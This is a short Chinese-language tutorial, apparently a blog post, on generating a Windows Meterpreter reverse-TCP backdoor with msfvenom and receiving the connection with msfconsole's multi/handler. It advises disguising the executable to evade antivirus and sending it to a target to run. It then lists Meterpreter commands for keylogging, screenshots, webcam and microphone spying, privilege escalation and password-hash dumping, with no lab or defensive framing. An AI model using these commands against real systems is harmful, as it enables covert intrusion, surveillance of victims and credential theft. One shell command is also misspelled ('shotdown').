一.利用命令生成后门程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe
LHOST:表示本机地址
-f :表示生成程序的后缀
met:文件名 可以自定义
把生成的exe文件发送给目标主机执行,注意记得伪装下否则会被杀毒软件识别,我这里是利用打包命令将其打包,然后发送到目标主机执行。
二.msfconsole 命令打开控制台
root@kali:~# msfconsole
设置好参数执行攻击
msfconsole > use exploit/multi/handler
msfconsole (exploit/multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msfconsole (exploit/multi/handler) > set LHOST <IP>
msfconsole (exploit/multi/handler) > set LPORT 443
msfconsole (exploit/multi/handler) > exploit
执行攻击,等待目标主机点击文件。执行成功!
对方点击,攻击成功,进入shell
乱码解决:
chcp 65001
进入shell,打开计算器
输入关机命令
shotdown -s -t 60
进入meterpreter之后即可进行一些相关木马操作
首先可以查看帮助文档,命令“help”,挑常用操作来讲↓↓↓
------------------------------------------------------------------------------------------------
用户操作:Stdapi: User interface Commands(用户接口命令)
enumdesktops -->列出所有可访问的桌面和窗口站(窗体列表)
getdesktop -->得到当前的Meterpreter桌面
idletime -->返回秒远程用户已经闲置数量
keyscan_start -->开始捕获击键(开始键盘记录)
keyscan_dump -->转储按键缓冲(下载键盘记录)
keyscan_stop -->停止捕获击键(停止键盘记录)
PS:键盘记录注意点,先开始,后下载,再结束,否则会出错
screenshot -->抓取交互式桌面截图(当前操作界面截图一张)
setdesktop -->改变meterpreters当前桌面
uictl -->控制一些用户界面组件(获取键盘、鼠标控制权)
使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)
摄像头:Stdapi: Webcam Commands(摄像头命令)
record_mic -->X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat -->开始视频聊天(视频,对方会有弹窗)
webcam_list -->单摄像头(查看摄像头列表)
webcam_snap -->采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream -->播放视频流从指定的摄像头(开启摄像头监控)
其他命令操作
getsystem -->获取高权限
hashdump -->获取当前用户hash
后续命令持续更新.....